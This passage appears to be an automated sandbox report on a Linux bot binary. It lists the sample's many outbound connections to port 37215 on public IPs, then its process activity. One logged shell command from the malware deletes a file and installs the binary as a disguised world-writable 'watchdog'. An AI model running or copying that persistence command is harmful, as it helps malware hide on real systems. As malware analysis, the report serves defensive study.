                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19969192.168.2.1346556197.182.56.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19970192.168.2.135387887.25.109.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19971192.168.2.1337726197.127.222.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19972192.168.2.134259641.122.28.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19973192.168.2.136083027.51.225.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19974192.168.2.1342634157.233.154.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19975192.168.2.1338542189.255.113.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19976192.168.2.135760041.67.124.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19977192.168.2.136098250.98.222.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19978192.168.2.1339332197.103.248.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19979192.168.2.134433472.70.249.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19980192.168.2.1352708157.75.87.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19981192.168.2.1335048157.177.3.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19982192.168.2.1360470157.102.99.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19983192.168.2.135017241.220.175.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19984192.168.2.134433041.124.54.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19985192.168.2.1347274157.158.35.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19986192.168.2.1342302157.131.226.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19987192.168.2.1360568221.145.197.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19988192.168.2.1345286157.47.22.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19989192.168.2.134283620.57.187.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19990192.168.2.1335258197.140.106.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19991192.168.2.1358052197.223.242.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19992192.168.2.1353394157.26.50.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19993192.168.2.1348918197.111.29.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19994192.168.2.1336488197.45.96.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19995192.168.2.1359180197.170.223.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19996192.168.2.134799846.77.13.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19997192.168.2.1351946197.248.43.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19998192.168.2.1347412157.53.36.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19999192.168.2.135216049.147.20.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20000192.168.2.134620641.218.240.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20001192.168.2.134932041.195.96.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20002192.168.2.135406241.32.118.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20003192.168.2.1357054157.239.69.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20004192.168.2.134318441.134.245.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20005192.168.2.1356938157.26.20.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20006192.168.2.1352392197.142.163.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20007192.168.2.1346334197.207.69.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20008192.168.2.1345732197.129.221.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20009192.168.2.1350970157.215.15.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20010192.168.2.133917041.26.21.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20011192.168.2.1359208157.200.76.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20012192.168.2.133310680.205.95.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20013192.168.2.1352726133.148.52.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20014192.168.2.135016441.39.135.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20015192.168.2.135246041.36.111.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20016192.168.2.134694417.181.113.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20017192.168.2.1359218157.164.209.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20018192.168.2.133938441.101.249.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20019192.168.2.1353972197.228.200.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20020192.168.2.1339666157.1.32.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20021192.168.2.134628457.100.154.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20022192.168.2.1351040197.38.39.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20023192.168.2.133464877.175.56.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20024192.168.2.1354724197.110.251.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20025192.168.2.1337240107.242.89.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20026192.168.2.135552875.77.8.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20027192.168.2.133929099.64.110.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20028192.168.2.1360654105.163.19.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20029192.168.2.133337641.116.111.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20030192.168.2.1340846157.86.231.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20031192.168.2.1347642197.244.104.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20032192.168.2.1353260157.173.69.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20033192.168.2.1359310197.199.36.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20034192.168.2.1354562197.186.13.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20035192.168.2.1334864197.84.70.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20036192.168.2.1358612197.243.151.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20037192.168.2.1342614157.222.242.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20038192.168.2.134843641.242.10.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20039192.168.2.1343128157.136.206.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20040192.168.2.1352866157.54.155.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20041192.168.2.1355722197.9.156.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20042192.168.2.133695841.135.62.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20043192.168.2.134019041.65.173.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20044192.168.2.1352912113.166.182.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20045192.168.2.1333548197.159.65.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20046192.168.2.135745841.146.230.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20047192.168.2.1359964152.196.163.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20048192.168.2.1346454197.10.186.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20049192.168.2.1350288197.186.217.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20050192.168.2.1350592157.90.59.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20051192.168.2.1335280197.27.172.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20052192.168.2.134280841.19.42.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20053192.168.2.133821041.72.178.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20054192.168.2.135827491.229.163.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20055192.168.2.135252641.102.54.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20056192.168.2.1341756197.170.116.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20057192.168.2.133790041.9.206.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20058192.168.2.1353080197.161.63.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20059192.168.2.1355090157.87.69.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20060192.168.2.1353054197.198.233.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20061192.168.2.133495641.252.227.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20062192.168.2.1350390157.62.61.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20063192.168.2.135109041.40.165.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20064192.168.2.1333478157.205.201.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20065192.168.2.1344922156.65.92.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20066192.168.2.134724835.197.40.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20067192.168.2.1345778157.43.223.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20068192.168.2.1339702197.68.214.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20069192.168.2.1336990157.138.132.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20070192.168.2.1350632157.78.46.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20071192.168.2.134105031.63.28.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20072192.168.2.1337730197.91.98.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20073192.168.2.1348612204.203.217.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20074192.168.2.135084641.165.214.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20075192.168.2.133311641.72.21.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20076192.168.2.1344354197.46.173.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20077192.168.2.1352098197.72.219.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20078192.168.2.1358866157.221.129.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20079192.168.2.1340518100.34.81.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20080192.168.2.134627841.225.141.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20081192.168.2.1334398157.105.19.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20082192.168.2.135666241.89.156.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20083192.168.2.1342496157.79.88.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20084192.168.2.1360416197.40.26.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20085192.168.2.1336568157.65.29.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20086192.168.2.1359206197.47.237.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20087192.168.2.1333406157.65.136.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20088192.168.2.1345882126.189.181.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20089192.168.2.1354628157.55.94.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20090192.168.2.13345668.249.61.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20091192.168.2.1337588197.207.53.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20092192.168.2.1347206197.126.105.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20093192.168.2.1340626197.73.163.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20094192.168.2.1341180166.4.13.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20095192.168.2.1358716197.38.21.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20096192.168.2.1360916157.157.61.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20097192.168.2.133529041.251.166.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20098192.168.2.1340950157.8.184.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20099192.168.2.1341744197.111.192.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20100192.168.2.134273490.81.244.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20101192.168.2.1336756197.162.5.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20102192.168.2.1360766202.33.66.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20103192.168.2.1344496197.106.142.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20104192.168.2.133600441.35.109.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20105192.168.2.1357124197.68.245.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20106192.168.2.1332868197.133.27.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20107192.168.2.1337692181.23.249.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20108192.168.2.1350564197.114.211.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20109192.168.2.1352538197.187.202.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20110192.168.2.1352238157.232.72.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20111192.168.2.1348650197.99.173.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20112192.168.2.1344090164.23.107.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20113192.168.2.1340174157.216.11.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20114192.168.2.1353786157.63.106.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20115192.168.2.1340900197.170.150.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20116192.168.2.134942495.231.172.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20117192.168.2.1351682157.51.83.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20118192.168.2.135805871.152.42.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20119192.168.2.1336556157.214.20.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20120192.168.2.1335276157.5.2.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20121192.168.2.134463869.71.130.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20122192.168.2.135757041.193.42.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20123192.168.2.1345210197.248.130.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20124192.168.2.1349402197.150.203.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20125192.168.2.135107641.221.184.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20126192.168.2.134164641.237.88.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20127192.168.2.1343388197.28.172.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20128192.168.2.1346268197.69.95.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20129192.168.2.1356066197.103.86.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20130192.168.2.1334294157.218.69.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20131192.168.2.1338882197.212.212.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20132192.168.2.133966632.66.83.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20133192.168.2.135850441.179.58.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20134192.168.2.134971035.24.131.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20135192.168.2.134012241.188.217.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20136192.168.2.1341474157.31.147.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20137192.168.2.1338126157.106.46.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20138192.168.2.1345138197.33.215.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20139192.168.2.1332854165.113.200.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20140192.168.2.1351556157.162.190.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20141192.168.2.135907641.148.105.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20142192.168.2.1345568197.139.144.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20143192.168.2.1353104197.104.120.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20144192.168.2.1351802197.173.214.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20145192.168.2.1333124157.42.126.2737215
                                                  TimestampBytes transferredDirectionData


                                                  System Behavior

                                                  Start time (UTC):08:58:51
                                                  Start date (UTC):24/05/2024
                                                  Path:/tmp/bot.x86.elf
                                                  Arguments:/tmp/bot.x86.elf
                                                  File size:89032 bytes
                                                  MD5 hash:19c2d1c3ba0c55c975cf3db34940774b

                                                  Start time (UTC):08:58:51
                                                  Start date (UTC):24/05/2024
                                                  Path:/tmp/bot.x86.elf
                                                  Arguments:-
                                                  File size:89032 bytes
                                                  MD5 hash:19c2d1c3ba0c55c975cf3db34940774b

                                                  Start time (UTC):08:58:51
                                                  Start date (UTC):24/05/2024
                                                  Path:/bin/sh
                                                  Arguments:sh -c "rm -rf bin/watchdog && mkdir bin; >bin/watchdog && mv /tmp/bot.x86.elf bin/watchdog; chmod 777 bin/watchdog"
                                                  File size:129816 bytes
                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                  Start time (UTC):08:58:51
                                                  Start date (UTC):24/05/2024
                                                  Path:/bin/sh
                                                  Arguments:-
                                                  File size:129816 bytes
                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                  Start time (UTC):08:58:51
                                                  Start date (UTC):24/05/2024
                                                  Path:/usr/bin/rm
                                                  Arguments:rm -rf bin/watchdog
                                                  File size:72056 bytes
                                                  MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                  Start time (UTC):08:58:51
                                                  Start date (UTC):24/05/2024
                                                  Path:/bin/sh
                                                  Arguments:-
                                                  File size:129816 bytes
                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                  Start time (UTC):08:58:51
                                                  Start date (UTC):24/05/2024
                                                  Path:/usr/bin/mkdir
                                                  Arguments:mkdir bin
                                                  File size:88408 bytes
                                                  MD5 hash:088c9d1df5a28ed16c726eca15964cb7

                                                  Start time (UTC):08:58:51
                                                  Start date (UTC):24/05/2024
                                                  Path:/bin/sh
                                                  Arguments:-
                                                  File size:129816 bytes
                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                  Start time (UTC):08:58:51
                                                  Start date (UTC):24/05/2024
                                                  Path:/usr/bin/mv
                                                  Arguments:mv /tmp/bot.x86.elf bin/watchdog
                                                  File size:149888 bytes
                                                  MD5 hash:504f0590fa482d4da070a702260e3716

                                                  Start time (UTC):08:58:51
                                                  Start date (UTC):24/05/2024
                                                  Path:/bin/sh
                                                  Arguments:-
                                                  File size:129816 bytes
                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                  Start time (UTC):08:58:51
                                                  Start date (UTC):24/05/2024
                                                  Path:/usr/bin/chmod
                                                  Arguments:chmod 777 bin/watchdog
                                                  File size:63864 bytes
                                                  MD5 hash:739483b900c045ae1374d6f53a86a279

                                                  Start time (UTC):08:58:51
                                                  Start date (UTC):24/05/2024
                                                  Path:/tmp/bot.x86.elf
                                                  Arguments:-
                                                  File size:89032 bytes
                                                  MD5 hash:19c2d1c3ba0c55c975cf3db34940774b

                                                  Start time (UTC):08:58:51
                                                  Start date (UTC):24/05/2024
                                                  Path:/tmp/bot.x86.elf
                                                  Arguments:-
                                                  File size:89032 bytes
                                                  MD5 hash:19c2d1c3ba0c55c975cf3db34940774b

                                                  Start time (UTC):08:58:51
                                                  Start date (UTC):24/05/2024
                                                  Path:/tmp/bot.x86.elf
                                                  Arguments:-
                                                  File size:89032 bytes
                                                  MD5 hash:19c2d1c3ba0c55c975cf3db34940774b
                                                  Start time (UTC):08:59:21
                                                  Start date (UTC):24/05/2024
                                                  Path:/usr/bin/dash
                                                  Arguments:-
                                                  File size:129816 bytes
                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                  Start time (UTC):08:59:21
                                                  Start date (UTC):24/05/2024
                                                  Path:/usr/bin/rm
                                                  Arguments:rm -f /tmp/tmp.b5Wv15YX0x /tmp/tmp.0KMjnFjb9Z /tmp/tmp.5S47IrwHi8
                                                  File size:72056 bytes
                                                  MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                  Start time (UTC):08:59:21
                                                  Start date (UTC):24/05/2024
                                                  Path:/usr/bin/dash
                                                  Arguments:-
                                                  File size:129816 bytes
                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                  Start time (UTC):08:59:21
                                                  Start date (UTC):24/05/2024
                                                  Path:/usr/bin/rm
                                                  Arguments:rm -f /tmp/tmp.b5Wv15YX0x /tmp/tmp.0KMjnFjb9Z /tmp/tmp.5S47IrwHi8
                                                  File size:72056 bytes
                                                  MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b